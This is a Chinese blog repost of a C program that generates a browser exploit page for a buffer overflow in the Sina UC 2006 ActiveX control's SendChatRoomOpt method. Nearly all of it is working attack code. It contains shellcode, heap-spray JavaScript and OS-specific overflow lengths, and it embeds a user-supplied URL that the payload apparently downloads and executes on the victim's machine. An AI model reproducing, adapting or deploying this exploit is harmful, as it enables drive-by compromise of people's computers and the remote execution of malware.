Sina UC 2006 Activex SendChatRoomOpt Exploit

于 2007-01-25 16:39:00 发布
阅读量785 收藏
点赞数
文章标签: fp url windows header buffer file
//
// Sina UC 2006 Activex SendChatRoomOpt Exploit
// Code by 云舒 & LuoLuo,ph4nt0morg
//

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>

FILE *fp = NULL;
char *file = "fuck_uc.html";
char *url = NULL;

unsigned char sc[] =    
"/x60/x64/xa1/x30/x00/x00/x00/x8b/x40/x0c/x8b/x70/x1c/xad/x8b/x70"
"/x08/x81/xec/x00/x04/x00/x00/x8b/xec/x56/x68/x8e/x4e/x0e/xec/xe8"
"/xff/x00/x00/x00/x89/x45/x04/x56/x68/x98/xfe/x8a/x0e/xe8/xf1/x00"
"/x00/x00/x89/x45/x08/x56/x68/x25/xb0/xff/xc2/xe8/xe3/x00/x00/x00"
"/x89/x45/x0c/x56/x68/xef/xce/xe0/x60/xe8/xd5/x00/x00/x00/x89/x45"
"/x10/x56/x68/xc1/x79/xe5/xb8/xe8/xc7/x00/x00/x00/x89/x45/x14/x40"
"/x80/x38/xc3/x75/xfa/x89/x45/x18/xe9/x08/x01/x00/x00/x5e/x89/x75"
"/x24/x8b/x45/x04/x6a/x01/x59/x8b/x55/x18/x56/xe8/x8c/x00/x00/x00"
"/x50/x68/x36/x1a/x2f/x70/xe8/x98/x00/x00/x00/x89/x45/x1c/x8b/xc5"
"/x83/xc0/x50/x89/x45/x20/x68/xff/x00/x00/x00/x50/x8b/x45/x14/x6a"
"/x02/x59/x8b/x55/x18/xe8/x62/x00/x00/x00/x03/x45/x20/xc7/x00/x5c"
"/x7e/x2e/x65/xc7/x40/x04/x78/x65/x00/x00/xff/x75/x20/x8b/x45/x0c"
"/x6a/x01/x59/x8b/x55/x18/xe8/x41/x00/x00/x00/x6a/x07/x58/x03/x45"
"/x24/x33/xdb/x53/x53/xff/x75/x20/x50/x53/x8b/x45/x1c/x6a/x05/x59"
"/x8b/x55/x18/xe8/x24/x00/x00/x00/x6a/x00/xff/x75/x20/x8b/x45/x08"
"/x6a/x02/x59/x8b/x55/x18/xe8/x11/x00/x00/x00/x81/xc4/x00/x04/x00"
"/x00/x61/x81/xc4/xdc/x04/x00/x00/x5d/xc2/x24/x00/x41/x5b/x52/x03"
"/xe1/x03/xe1/x03/xe1/x03/xe1/x83/xec/x04/x5a/x53/x8b/xda/xe2/xf7"
"/x52/xff/xe0/x55/x8b/xec/x8b/x7d/x08/x8b/x5d/x0c/x56/x8b/x73/x3c"
"/x8b/x74/x1e/x78/x03/xf3/x56/x8b/x76/x20/x03/xf3/x33/xc9/x49/x41"
"/xad/x03/xc3/x56/x33/xf6/x0f/xbe/x10/x3a/xf2/x74/x08/xc1/xce/x0d"
"/x03/xf2/x40/xeb/xf1/x3b/xfe/x5e/x75/xe5/x5a/x8b/xeb/x8b/x5a/x24"
"/x03/xdd/x66/x8b/x0c/x4b/x8b/x5a/x1c/x03/xdd/x8b/x04/x8b/x03/xc5"
"/x5e/x5d/xc2/x08/x00/xe8/xf3/xfe/xff/xff/x55/x52/x4c/x4d/x4f/x4e"
"/x00";

char * header =
"<!--/n"
"clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384/n"
"C:/Program Files/sina/UC/ActiveX/BROWSER2UC.dll/n/n"

"Sub SendChatRoomOpt (/n"
"    ByVal astrVerion  As String ,/n"
"    ByVal astrUserID  As String ,/n"
"    ByVal asDataType  As Integer ,/n"
"    ByVal alTypeID  As Long/n"
")/n/n"
"ph4nt0m.org, Code By 云舒 & LuoLuo/n"
"!-->/n/n"
"<html>/n"
"<head>/n"
"<script language=/"javascript/">/n"
"var heapSprayToAddress = 0x0c0c0c0c;/n"
"var shellcode = unescape(/"%u9090/"+/"%u9090/"+ /n";

char * footer =
"/n"
"var heapBlockSize = 0x100000;/n"
"var payLoadSize = shellcode.length * 2;/n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);/n"
"var spraySlide = unescape(/"%u9090%u9090/");/n/n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);/n"
"heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;/n"
"memory = new Array();/n/n"
"for (i=0;i<heapBlocks;i++)/n{/n"
"/t/tmemory = spraySlide + shellcode;/n}/n"

"function getSpraySlide(spraySlide, spraySlideSize)/n{/n/t"
"while (spraySlide.length*2<spraySlideSize)/n/t"
"{/n/t/tspraySlide += spraySlide;/n/t}/n"
"/tspraySlide = spraySlide.substring(0,spraySlideSize/2);/n/treturn spraySlide;/n}/n/n";

// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
    int i;
    for(i=0;i < buffsize;i+=2)
    {
        if((i%16)==0)
        {
            if(i!=0)
            {
                fprintf(fp, "%s", "/" +/n/"");
            }
            else
            {
                fprintf(fp, "%s", "/"");
            }
        }
        fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
    }
    //把shellcode打印在header后面,然后用 " ) " 闭合
    fprintf(fp, "%s", "/");/n");  
}


int main( int argc, char *argv[] )
{
    if( argc != 3 )
    {
        printf( "/nUC ActiveX object exp,Code by 云舒 & LuoLuo,ph4nt0morg/n" );
        printf( "Usage: %s   <url>   <os>/n", argv[0] );
        printf( "      1     Windows XP SP2 Chinese version,IE 6/n" );
        printf( "      2     Windows 2003 standard SP1 Chinese Version, IE 6/n" );
        
        return -1;
    }
    
    char    seh[1024] = { 0 };
    int        os = atoi( argv[2] );
    int        len = 0;
    
    if( os == 1 )
    {
        len = 3133;
    }
    else if( os == 2 )
    {
        len = 3193;
    }
    
    sprintf( seh , "var obj = new ActiveXObject(/"BROWSER2UC.BROWSERToUC/");/n/tvar arg1;/n/n<!-- Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 -->/n<!-- Windows XP SP2 + IE6 此处覆盖长度i为3133 -->/n/nfor( var i = 0; i < %d; i ++ )/n{/targ1 += /"A/";/n}arg1=arg1 + unescape(/"%%0c%%0c%%0c%%0c/");/narg2=/"defaultV/";/narg3=1;/narg4=1;/nobj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);/n</script>/n</head>/n</html>", len );
    
    url = argv[1];
    if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
    {
        printf("[-] Invalid url. Must start with 'http://','ftp://'/n");
        return -1;                
    }

    printf("[+] download url:%s/n", url);

    fp = fopen( file , "w" );
    if( fp == NULL )
    {
        printf( "Create file error: %d/n", GetLastError() );
        return -1;
    }
    fprintf( fp, "%s", header );
    fflush( fp );
    
    char    buffer[4096] = { 0 };
    int        sc_len = sizeof(sc)-1;
    memcpy(buffer, sc, sc_len);
    memcpy(buffer+sc_len, url, strlen(url));
  
    sc_len += strlen(url)+1;
    PrintPayLoad((char *)buffer, sc_len);
    fflush( fp );
    
    fprintf( fp, "%s", footer );
    fprintf( fp, "%s", seh );
    
    fflush( fp );
    fclose( fp );

    printf( "Create done!please look %s/n", file );
} 
iiprogram
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值